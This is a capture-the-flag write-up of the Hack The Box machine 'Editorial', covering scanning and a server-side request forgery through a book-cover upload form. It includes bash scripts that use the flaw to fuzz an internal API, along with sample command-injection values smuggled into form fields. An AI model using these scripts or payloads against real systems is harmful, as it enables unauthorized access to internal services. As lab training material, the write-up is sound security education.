HTB Editorial - An Adventure
A detailed writeup of the Hack The Box machine Editorial.
Nate
Reading Time: 25 Minutes, 53 Seconds
2025-04-25
In this adventure, we’ll be taking a look at the retired Hack The Box machine, “Editorial.”
I call this an adventure rather than a walkthrough because I don’t want it to be a clean, step-by-step guide without missteps. Instead, I want it to be raw—capturing my real thought process, mistakes, failures, and discoveries. I believe this authenticity is often missing from cybersecurity write-ups, making them unnecessarily intimidating, especially for beginners. Struggling and making mistakes is how we all learn.
If you’re looking for a clean-cut, step-by-step guide, this isn’t it. I’m sure there are plenty out there. However, in an effort to build my own skills and provide an authentic learning experience, I haven’t looked at any of them.
Let’s get started!
Diving in & Enumeration
Initial Nmap Scan
After spawning the box we’re presented with a single IP address: 10.10.11.20.
Let’s start things off with an initial Nmap TCP scan of the provided IP address. Since non-standard ports are common in these challenges, I opted to scan all ports with -p-.
nmap -sC -sV -p- -oN editorial-scan 10.10.11.20
# Nmap 7.95 scan initiated Tue Apr 22 17:20:04 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -p- -oN editorial-scan 10.10.11.20
Nmap scan report for 10.10.11.20
Host is up (0.079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_ 256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 22 17:20:55 2025 -- 1 IP address (1 host up) scanned in 51.62 seconds
Nmap returns only 2 open TCP ports, 80 and 22. I also ran a UDP scan, but it returned no open ports.
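For the curious, a quick top-ports UDP sweep along the lines of the command below is usually enough; scanning all 65,535 UDP ports takes far too long to be practical. Treat it as a sketch rather than a capture from this box:
sudo nmap -sU --top-ports 100 -oN editorial-udp-scan 10.10.11.20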
Since we don’t have any SSH credentials at the moment, let’s take a look at the web server running on port 80.
Visiting the webserver
Navigating to http://10.10.11.20:80 immediately redirects you to http://editorial.htb/, so let’s add that to our /etc/hosts file.
echo "10.10.11.20 editorial.htb" | sudo tee -a /etc/hosts
After adding the domain to our hosts file and refreshing the page, we arrive at 'Editorial Tiempo Arriba', which, according to (always accurate) Google Translate, means 'Editorial Time Up'. I'm guessing it actually translates to something along the lines of "Up Time Publishing".
Home Page:
After looking around the page, it appears that both the search bar and subscription box are not functional. In addition, only the “About” and “Publish with us” links work.
About page:
The "About" page doesn't offer much, but we'll take note of the email address "[email protected]" at the bottom of the page, add tiempoarriba.htb to our /etc/hosts file, and move on.
echo "10.10.11.20 tiempoarriba.htb" | sudo tee -a /etc/hosts
Visiting the “Publish with us” page reveals something much more interesting and, hopefully, vulnerable—an upload form!
Before we dive into this form, let’s finish our initial enumeration and discovery by enumerating directories, subdomains, and v-hosts with Ffuf.
Directory, Subdomain, and V-Host Enumeration With Ffuf
I started by enumerating directories for editorial.htb. I had to step away for a moment, so I chose a bigger list than usual to start with and just let it run.
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://editorial.htb/FUZZ -c -t 20 -o editorial-subdirs
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://editorial.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 20
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
about [Status: 200, Size: 2939, Words: 492, Lines: 72, Duration: 87ms]
upload [Status: 200, Size: 7140, Words: 1952, Lines: 210, Duration: 80ms]
It looks like the items discovered were the two pages we already know about.
I also tried subdomain and vhost enumeration with different lists from Seclists, but didn’t find anything.
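For reference, a vhost pass with Ffuf looks roughly like the command below. The wordlist is a common SecLists choice, and -ac auto-calibrates the filters so the catch-all response doesn't flood the output; this is a sketch of the approach rather than the exact command I ran:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.11.20/ -H "Host: FUZZ.editorial.htb" -c -t 20 -ac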
I then repeated the same process for tiempoarriba.htb. It turned out to be pretty boring and appears to contain no subdomains, vhosts, or directories of its own. From what I can tell, its sole function is to redirect to editorial.htb.
Let’s take a deeper look at the upload form.
Upload Form Exploration & Attempted Exploitation
Admittedly, I was excited and got ahead of myself here: I immediately tried uploading a PHP reverse shell via the file selector, and then via the "Cover URL" field using a Python HTTP server on my attack box. Neither attempt worked.
Taking a step back, a look at Wappalyzer (not a sponsor) shows that editorial.htb is running Hugo, a static site generator. This means there's no PHP to exploit.
Let’s take a look at the page’s source code next.
Source Code Analysis
Taking a look at the source code reveals a point of interest:
<script>
document.getElementById('button-cover').addEventListener('click', function(e) {
e.preventDefault();
var formData = new FormData(document.getElementById('form-cover'));
var xhr = new XMLHttpRequest();
xhr.open('POST', '/upload-cover');
xhr.onload = function() {
if (xhr.status === 200) {
var imgUrl = xhr.responseText;
console.log(imgUrl);
document.getElementById('bookcover').src = imgUrl;
document.getElementById('bookfile').value = '';
document.getElementById('bookurl').value = '';
}
};
xhr.send(formData);
});
</script>
The above script sends a POST request to /upload-cover containing the form data. The server responds with a string: the path where the uploaded (or fetched) file was stored. That path is logged to the console and used as the source of the cover preview image. The script also resets the "bookfile" and "bookurl" values.
Something I found interesting is that the script submits both the linked URL and the attached file in a single request, yet only gets one path back. It's not immediately clear how the server handles receiving both a linked file and a directly uploaded file in the same request. Perhaps this is something we can investigate later.
Testing File Upload
I uploaded a random file to test the upload function. We received a URL back in the console and the form was cleared, as expected.
When visiting the URL provided by the console, the file is immediately downloaded rather than rendered on the page. Directory listing is also not enabled for the /static or /static/uploads directory. Unfortunately, this file upload doesn’t seem like a viable attack method.
Testing Cover URL Requests
Let’s test the cover upload via HTTP:
First, we’ll start a python server on our attack box.
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
I then created a test.txt file in my current directory and submitted its URL via the "Cover URL" box.
Upon submission, we can see that the request was successful and that the target was able to retrieve our test file.
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.20 - - [23/Apr/2025 19:56:41] "GET /test.txt HTTP/1.1" 200 -
Unfortunately, this file is also renamed when it is uploaded.
Navigating to the file’s URL results in the same behavior of the file immediately downloading, rather than being rendered in the page.
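My assumption is that the forced download comes down to the Content-Type (or a Content-Disposition header) the server sets on /static/uploads responses. A quick header check would confirm it; the path below is a placeholder for whatever URL the console hands back:
curl -sI "http://editorial.htb/static/uploads/<uuid-from-console>"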
I then tried shell command injection via the attachment filename and the image URL by modifying the POST request in ZAProxy, in case the renaming was handled by a shell in an insecure manner. Unfortunately, this did not work.
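To give an idea of what that looked like, the attempts were just classic shell metacharacters dropped into the URL and filename fields. Something along these lines (purely illustrative, and none of it worked):
# Hypothetical injection attempts via the cover URL and the uploaded filename
curl -s -X POST http://editorial.htb/upload-cover \
  --form-string 'bookurl=http://10.10.14.13:8000/test.txt;id' \
  -F 'bookfile=@test.txt;filename=test$(id).txt'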
Is Uploading Two Files At Once Handled Differently?
Since the form only returns one string to rename the files, it made me wonder how uploading two files at once is handled.
Let’s try uploading two images of Clippy to see which one is displayed in the preview, and if we get two strings back in the console.
It appears that clippy1.jpg (URL upload) was displayed and took priority over clippy2.jpeg (attachment upload).
We also received only one URL back in the console.
Taking a look at the web request body, we can see that the image URL is provided before the attachment, which makes sense because it is the first element of the form. My initial theory is that the server uses the first item provided to it, be it the URL or attached file, and discards the second item, if present.
-----------------------------134243872140118328451478405779
Content-Disposition: form-data; name="bookurl"
http://10.10.14.13:8000/clippy1.jpg
-----------------------------134243872140118328451478405779
Content-Disposition: form-data; name="bookfile"; filename="clippy2.jpeg"
Content-Type: image/jpeg
ÿØÿà JFIF ÿÛ
<SNIP>
Searching For Exploits
It seems I’ve hit a bit of a dead end with the upload form. With no other interesting pages or obvious paths forward, I’m running out of options to explore. At this point, I decided to pivot toward researching potential exploits. Using the versions identified by Wappalyzer, I searched for known exploits for the detected versions of Nginx and Hugo through Searchsploit and Google.
Unfortunately, I was unable to find any exploits that we could take advantage of in our current situation.
It’s okay to ask for help!
At this point, I was fresh out of ideas on how to continue and, admittedly, a bit frustrated. If this were a real-world scenario, it would be time to ask for help and bounce ideas off a coworker. However, since this is Hack The Box, we can't do that. Instead, let's take a look at the next relevant hint in "Guided mode". To do so, we have to answer the questions up to our current point in this simulated assessment.
This brings us to “Task 4” in “Guided mode”:
What TCP port is serving another webserver listening only on localhost?
Very interesting! I didn’t think to use the image URL upload feature on the upload form to scan for an internal web server.
Using The Image URL Upload Feature To Scan For An Internal Web Server
We can accomplish this by sending the /upload-cover POST request to the fuzzer in ZAProxy.
Once we have the request open in the fuzzer, we can change the URL in the request body to http://127.0.0.1:1.
We’ll then highlight the port number and add it as a fuzz location. Since we’re only fuzzing for open ports, we’ll use the “Numberzz” payload and set it to fuzz for 1-5000 in increments of one and start the fuzzer.
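ZAP's fuzzer works fine here, but the same sweep could also be scripted with curl. A rough sketch, assuming the endpoint accepts a request containing only the bookurl field (if it doesn't, the full multipart body used in the scripts later in this post can be substituted):
#!/bin/bash
# Sketch: probe internal ports through the /upload-cover endpoint and record each response.
for port in $(seq 1 5000); do
    body=$(curl -s -X POST http://editorial.htb/upload-cover -F "bookurl=http://127.0.0.1:${port}")
    echo "${port} ${body}"
done > port-sweep.txt
# Rare response values stand out once grouped:
# awk '{print $2}' port-sweep.txt | sort | uniq -c | sort -n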
After the fuzzer completes and upon reviewing the responses, it looks like we have quite a few responses with a body of “/static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg” and a body size of 61 bytes. It appears the server returns this image if there is an error while retrieving the URL provided in our request.
Let’s sort by “Size Resp. Body” to see if there are any different responses.
We have a hit at port 5000—right at the very end of our fuzzing range! What a lucky hit for an arbitrary set of ports I decided to start with!
Port 5000 seems to have returned data, which the server then renamed before providing us with a URL.
Let’s take a look at the URL we were provided!
That’s… disappointing. My suspicion is that the server on port 5000 returned an HTTP 200 - OK response but didn’t actually return any data. This likely resulted in the upload form providing us a URL that points to nothing, since no data was saved — which is why we’re on this wonderful page.
The good news is, we have another web server to enumerate!
Internal Web Server Enumeration
We’ll repeat the same method we used above to discover the internal web server with ZAProxy, but this time we’ll enumerate content by targeting http://127.0.0.1:5000/FUZZ, using two lists from SecLists: directory-list-2.3-medium.txt and api-endpoints-res.txt.
This resulted in 232,880 requests, each with a response body size of 51 bytes and a URL within the body. It’s probably safe to assume that the webserver on port 5000 returns HTTP 200 for any request sent to it. To figure out if any of these URLs actually contain data, we’ll need to extract them and place them in a list to query. That way, we can see which of them, if any, return data.
By the way, don’t try to persist your ZAP session after you’ve performed fuzzing unless you really want to clear your fuzzing history and wait for it to complete again. (╯ರ ~ ರ)╯︵ ┻━┻
Though, there is something to be said for starting with smaller fuzzing lists.
Unfortunately, ZAProxy doesn’t have a native way to export the response bodies as a list. However, we can export our fuzzing data as a .HAR and use grep to extract the URLs we need from the response body.
Remember what I just said about starting with smaller fuzzing lists? Apparently, ZAP doesn't like exporting ~200K requests at once as a .HAR file. It doesn't complain, but the resulting file is 0 bytes. So I re-fuzzed with directory-list-2.3-small.txt and api-endpoints-res.txt. I was then able to export the ~100K requests as a .HAR.
To do so, we’ll need a regular expression. I’m not that great at building regular expressions, so we’ll use Regex Generator (https://regex-generator.olafneumann.org).
After pasting a sample URL and specifying the UUID as the interesting pattern for the RegEx, we’re presented with the following RegEx:
^static/uploads/[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}$
RegEx Generator even provides us with a pre-written grep command!
grep -P -i 'static/uploads/[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}' [FILE...]
We’ll add -o to the command to clean up the output so it’s only text that matches our Regex, with each match on a new line. Let’s also redirect the output to a new file so we have a saved list to fuzz with.
grep -P -i -o 'static/uploads/[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}' localhost-5000-fuzz.har > localhost5000-url-list
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ wc -l localhost5000-url-list
99985 localhost5000-url-list
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ head localhost5000-url-list
static/uploads/4afe3780-06cd-4fbc-8c69-a63ec58dfdea
static/uploads/7a700c97-87e8-4f5e-9c47-048bc8d65ca8
static/uploads/1362a2af-79d3-4abc-bba5-dea65bf4a119
static/uploads/b0e003f5-1cc7-43c4-b4a6-d2be0bddf4da
static/uploads/fbf6ec84-6884-4f7b-a9a0-16960d7e2d5c
static/uploads/987abd72-46fc-4eab-8910-1cbc5e9b5b8b
static/uploads/e3ef3490-21d8-4f14-a134-247ff7fcb9c0
static/uploads/421abc85-c6c3-4c1c-84f8-61f0e1529f25
static/uploads/62f8d9fa-3007-45d0-8de0-1a1e9f5d93bf
static/uploads/2fdb1696-7fc4-4c1a-b862-e0863a341e47
Now that we have a list of URLs extracted from the response body, we can start checking to see if any of them return content instead of a 404.
To check if any of these URLs return content, we’ll go back to Ffuf.
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ ffuf -w localhost5000-url-list:FUZZ -u http://editorial.htb/FUZZ -t 50
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://editorial.htb/FUZZ
:: Wordlist : FUZZ: /home/kali/HTB/editorial/localhost5000-url-list
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [99985/99985] :: Job [1/1] :: 628 req/sec :: Duration: [0:02:41] :: Errors: 0 ::
That's interesting: nothing matched any of the response codes Ffuf looks for by default. I would expect something from the lists we used to return data. Let's match all response codes to see what Ffuf is getting back.
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ ffuf -w localhost5000-url-list:FUZZ -u http://editorial.htb/FUZZ -t 50 -mc all
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://editorial.htb/FUZZ
:: Wordlist : FUZZ: /home/kali/HTB/editorial/localhost5000-url-list
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: all
________________________________________________
static/uploads/987abd72-46fc-4eab-8910-1cbc5e9b5b8b [Status: 404, Size: 207, Words: 27, Lines: 6, Duration: 83ms]
static/uploads/62f8d9fa-3007-45d0-8de0-1a1e9f5d93bf [Status: 404, Size: 207, Words: 27, Lines: 6, Duration: 83ms]
static/uploads/4afe3780-06cd-4fbc-8c69-a63ec58dfdea [Status: 404, Size: 207, Words: 27, Lines: 6, Duration: 83ms]
static/uploads/2fdb1696-7fc4-4c1a-b862-e0863a341e47 [Status: 404, Size: 207, Words: 27, Lines: 6, Duration: 86ms]
static/uploads/fada359a-94a8-43db-8974-925f8a287cdb [Status: 404, Size: 207, Words: 27, Lines: 6, Duration: 86ms]
It looks like we're getting back a 404 for every page. Just for a sanity check, let's grab test.txt from our attack box via a Python web server and a manual request sent through ZAP, then try to visit the URL in Firefox.
We can see above that a URL was returned in the response body, and checking the HTTP server on our attack box shows the file was retrieved.
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.20 - - [24/Apr/2025 19:00:54] "GET /test.txt HTTP/1.1" 200 -
When we visit the URL in Firefox, we immediately receive a file.
But when I tried to visit the URL again after a few minutes, I got a 404 error. Are these files deleted after they are accessed? Are they moved after a set time?
Next, I performed a very scientific test: I re-submitted the request in ZAP, received a new URL, and started counting from the moment of submission. I then requested the URL with curl every 10 seconds until I got a 404.
┌──(kali㉿kali)-[~]
└─$ curl http://editorial.htb/static/uploads/3d1d6e36-f5dc-4a29-8694-245b99c0180f
this is a test
┌──(kali㉿kali)-[~]
└─$ curl http://editorial.htb/static/uploads/3d1d6e36-f5dc-4a29-8694-245b99c0180f
this is a test
<SNIP>
┌──(kali㉿kali)-[~]
└─$ curl http://editorial.htb/static/uploads/3d1d6e36-f5dc-4a29-8694-245b99c0180f
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
I did this multiple times, and each time I received a 404 after roughly 60 seconds. That shows the file is not deleted after it is accessed, and it makes a strong case that uploads are moved or deleted after about a minute. You might be thinking I could have written a script to do this… You're probably right.
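For anyone who would rather script that test, a small loop like this does the same thing; the path is a placeholder for whatever URL /upload-cover hands back:
#!/bin/bash
# Sketch: poll an uploaded file every 10 seconds until it stops resolving, then report its lifetime.
url="http://editorial.htb/static/uploads/<uuid-from-upload-response>"
start=$(date +%s)
while curl -sf -o /dev/null "$url"; do
    sleep 10
done
echo "404 after $(( $(date +%s) - start )) seconds"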
So this means we have a roughly 60-second window from when the request is submitted to retrieve the data it generates. To take advantage of this, we'll have to write a script that submits the fuzz request and then immediately tries to retrieve the URL we get back.
#!/bin/bash
#Set fuzz list file to import and use
fuzzlist="FUZZFILEHERE"
#Loop to read each item from the fuzz list
while read fuzzitem; do
echo "Submitting - $fuzzitem"
#For each item in the list, send a POST request containing the item from the fuzz list, which should return a partial URL from the response body. We'll also wrap curl in a variable so we can retrieve the output.
response=$(curl -s -X POST http://editorial.htb/upload-cover \
-H "Host: editorial.htb" \
-H "User-Agent: Mozilla/5.0" \
-H "Accept: */*" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Content-Type: multipart/form-data; boundary=---------------------------367237918129785721433957227571" \
-H "Origin: https://editorial.htb" \
-H "Connection: keep-alive" \
-H "Referer: https://editorial.htb/upload" \
-H "Sec-Fetch-Dest: empty" \
-H "Sec-Fetch-Mode: cors" \
-H "Sec-Fetch-Site: same-origin" \
--data-binary @- <<EOF
-----------------------------367237918129785721433957227571
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/$fuzzitem
-----------------------------367237918129785721433957227571
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream

-----------------------------367237918129785721433957227571--
EOF
)
#Next, we'll extract the partial URL from the response body using our previously generated regex.
partialurl=$(echo "$response" | grep -oE 'static/uploads/[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}')
#If we actually get a partial URL back, we'll combine it with our base URL and pass it to WGET to save the content to look through after the script completes.
if [[ -n "$partialurl" ]]; then
fullurl="http://editorial.htb/$partialurl"
echo "Requesting - $fullurl"
wget -q "$fullurl"
else
echo "No RegEx match in response"
fi
#Tell bash where to read the data from
done < "$fuzzlist"
This took a while to make and probably isn't the most efficient way to accomplish this, but I need all the practice with bash scripts I can get. For the sake of simplicity, and since we're only running this once, we'll combine the two lists we want to use into one file and save it in the folder with our bash script.
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ wc -l /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt && wc -l /usr/share/wordlists/seclists/Discovery/Web-Content/api/api-endpoints-res.txt
87650 /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
12334 /usr/share/wordlists/seclists/Discovery/Web-Content/api/api-endpoints-res.txt
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ cat /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt /usr/share/seclists/Discovery/Web-Content/api/api-endpoints-res.txt > combinedlist.txt
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ wc -l combinedlist.txt
99984 combinedlist.txt
The line count of combinedlist.txt indicates that combining our two lists was successful. I then changed the input file in the script and ran it.
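Changing the input file is just a matter of updating the variable at the top of the script:
fuzzlist="combinedlist.txt"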
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ ./fuzz-and-request.sh
Submitting - index
Requesting - http://editorial.htb/static/uploads/34495a50-f4fb-43ab-b69e-50a9d3d5798d
Submitting - images
Requesting - http://editorial.htb/static/uploads/af2393f9-3cae-41b7-adc7-f90ea518f07a
Submitting - download
Requesting - http://editorial.htb/static/uploads/e7f45b7b-33ed-485a-b339-777b583956ff
Submitting - 2006
Requesting - http://editorial.htb/static/uploads/b6ae9e64-8784-447f-b9be-dfa8d225c505
Submitting - news
Requesting - http://editorial.htb/static/uploads/a7e6b182-42d9-4ff4-b2b0-8327455cbedd
….aaaaand it’s painfully slow. We’re going to be here for hours to days waiting for this to finish. If we want to get through this, we’re either going to need to use smaller lists or speed up the script. I’m going with the latter for the sake of learning. So much for simplicity! :)
A quick Google search (and a good bit of trial and error) shows that we can modify the script to run with GNU parallel, which has awesome man pages, by the way.
Here’s the updated script:
#!/bin/bash
#Removed the while loop and made fuzzitem the first arg passed to the script to make it compatible with parallel
fuzzitem="$1"
#Print what we're requesting
echo "Submitting - $fuzzitem"
#Send a POST request containing the item from the fuzz list, which should return a partial URL from the response body. We'll also wrap curl in a variable so we can retrieve the output.
response=$(curl -s -X POST http://editorial.htb/upload-cover \
-H "Host: editorial.htb" \
-H "User-Agent: Mozilla/5.0" \
-H "Accept: */*" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Content-Type: multipart/form-data; boundary=---------------------------367237918129785721433957227571" \
-H "Origin: https://editorial.htb" \
-H "Connection: keep-alive" \
-H "Referer: https://editorial.htb/upload" \
-H "Sec-Fetch-Dest: empty" \
-H "Sec-Fetch-Mode: cors" \
-H "Sec-Fetch-Site: same-origin" \
--data-binary @- <<EOF
-----------------------------367237918129785721433957227571
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/$fuzzitem
-----------------------------367237918129785721433957227571
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream

-----------------------------367237918129785721433957227571--
EOF
)
#Next, we'll extract the partial URL from the response body using our previously generated regex.
partialurl=$(echo "$response" | grep -oE 'static/uploads/[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}')
#If we actually get a partial URL back, we'll combine it with our base URL and pass it to WGET to save the content to look through after the script completes.
if [[ -n "$partialurl" ]]; then
fullurl="http://editorial.htb/$partialurl"
echo "Requesting - $fullurl"
wget -q "$fullurl"
else
echo "No RegEx match in response"
fi
Now we have to run the script with parallel, like so:
parallel -j 0 ./parallel-fuzznrequest.sh {} :::: combinedlist.txt
Setting jobs to 0 allows us to run as many jobs as our CPU can handle, since we’re trying to get this done as fast as we can.
One unfortunate thing about this implementation is that I'm going to end up with ~100k files in my folder. A bit of an oversight for sure. But hey, we're here to learn and break things. We'll handle the output more gracefully next time.
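If I were running it again, a small tweak to the wget line would at least keep the output contained and traceable back to the word that produced it; a sketch of what I mean:
# Write each result into a results/ directory, named after the fuzzed word instead of the random UUID
mkdir -p results
outfile="results/$(echo "$fuzzitem" | tr '/' '_')"
wget -q -O "$outfile" "$fullurl"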
The script took ~20 minutes to run and we now have an unreasonable amount of files in the folder we ran the script in.
<SNIP>
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 413bd009-b98b-4617-bbcd-074e8cf8e1e6
-rw-rw-r-- 1 kali kali 207 Apr 24 23:13 413cb2b8-cacd-4353-843a-886d48c0c18a
-rw-rw-r-- 1 kali kali 207 Apr 24 23:22 413d049a-18c0-424f-bf87-36d7980565bb
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 413d884e-01d4-41bd-9bee-c82624111c66
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 413e6eed-b297-4461-a76c-c5947dd43735
-rw-rw-r-- 1 kali kali 207 Apr 24 23:19 413e9783-83ab-4e4e-af16-82cca8024d1e
-rw-rw-r-- 1 kali kali 207 Apr 24 23:23 413ec3aa-2bd3-439a-a29a-a94f92e664be
-rw-rw-r-- 1 kali kali 207 Apr 24 23:19 413fb5cf-01d5-4ffb-b15d-3d3d33377faa
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 4140b258-7967-4914-9a82-a3ddb12272ec
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 41416bc4-7400-463b-a51f-4ce033afe6cd
-rw-rw-r-- 1 kali kali 207 Apr 24 23:19 41421891-9ac4-4622-b617-74087d0fd1dd
-rw-rw-r-- 1 kali kali 207 Apr 24 23:13 414219e9-906f-45a9-bf8e-64e1bf3fa9a4
-rw-rw-r-- 1 kali kali 207 Apr 24 23:22 41428d77-523f-4324-b69d-d34bf900ccbe
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 4143351a-e649-4da0-abba-57926c0af0e1
-rw-rw-r-- 1 kali kali 207 Apr 24 23:14 41444f79-a132-4d6f-8813-9900151169ea
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 414648df-853a-40ce-a3ff-2f0a65d628f8
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 4147c1ca-eae9-4fb7-b019-0c83e20b8cbb
-rw-rw-r-- 1 kali kali 207 Apr 24 23:16 4148a549-d526-46a0-8c40-c28246b83198
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 4148bc58-6657-4c6b-ba1e-1605fb22d14a
-rw-rw-r-- 1 kali kali 207 Apr 24 23:18 414b6f6a-d3ea-46c6-b92c-797fd240e78d
-rw-rw-r-- 1 kali kali 207 Apr 24 23:21 414bd0c2-4ad4-4cd1-875e-becdf62e59f7
<SNIP>
It seems that the majority of the files here are 207 bytes. We can use find with rm to remove every file that is exactly 207 bytes and print what it deleted.
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ find . -type f -size 207c -exec rm -v {} \;
removed './02a38ce9-f890-4fe1-9c19-b24650dcf322'
removed './4c8b12fb-0dc5-403f-ba4c-2fd34521378b'
removed './4947f15d-e777-4381-a5ee-b1f53fb3b901'
removed './973901da-ebc0-4036-b35a-28daa525fa98'
removed './963f84fc-3c9b-45bf-b1cc-645660c5f971'
<SNIP>
Now we’re left with 5 files. That worked out better than I thought it would!
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ ls
2560287a-94fc-4493-9f97-3a8b4d83e035 312af474-10ed-4c2b-b9d9-e5a060522d96 889448e2-bab7-42c2-bd5f-f28e130cfa1a df876560-b73c-4dc5-88ac-7e783bf30d58 ef254d2b-f900-46c5-9eb9-1dd88bc21e46
I started by using cat * to quickly check the file contents. It looks to be JSON, but some of it repeats. Instead of manually comparing the files to see if the contents are duplicates, let's use md5sum.
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ md5sum *
b97108fe4a69d0067fc30b9708c73a8f 312af474-10ed-4c2b-b9d9-e5a060522d96
b97108fe4a69d0067fc30b9708c73a8f 889448e2-bab7-42c2-bd5f-f28e130cfa1a
b97108fe4a69d0067fc30b9708c73a8f 2560287a-94fc-4493-9f97-3a8b4d83e035
b97108fe4a69d0067fc30b9708c73a8f df876560-b73c-4dc5-88ac-7e783bf30d58
b97108fe4a69d0067fc30b9708c73a8f ef254d2b-f900-46c5-9eb9-1dd88bc21e46
It looks like all the file hashes are the same.
We'll take one of the files and pipe it to jq to view the contents in a readable format.
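Any of the five will do, since the hashes match:
cat 2560287a-94fc-4493-9f97-3a8b4d83e035 | jq .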
{
"messages": [
{
"promotions": {
"description": "Retrieve a list of all the promotions in our library.",
"endpoint": "/api/latest/metadata/messages/promos",
"methods": "GET"
}
},
{
"coupons": {
"description": "Retrieve the list of coupons to use in our library.",
"endpoint": "/api/latest/metadata/messages/coupons",
"methods": "GET"
}
},
{
"new_authors": {
"description": "Retrieve the welcome message sended to our new authors.",
"endpoint": "/api/latest/metadata/messages/authors",
"methods": "GET"
}
},
{
"platform_use": {
"description": "Retrieve examples of how to use the platform.",
"endpoint": "/api/latest/metadata/messages/how_to_use_platform",
"methods": "GET"
}
}
],
"version": [
{
"changelog": {
"description": "Retrieve a list of all the versions and updates of the api.",
"endpoint": "/api/latest/metadata/changelog",
"methods": "GET"
}
},
{
"latest": {
"description": "Retrieve the last version of api.",
"endpoint": "/api/latest/metadata",
"methods": "GET"
}
}
]
}
Finally, progress! We're presented with a list of API endpoints and a description of each.
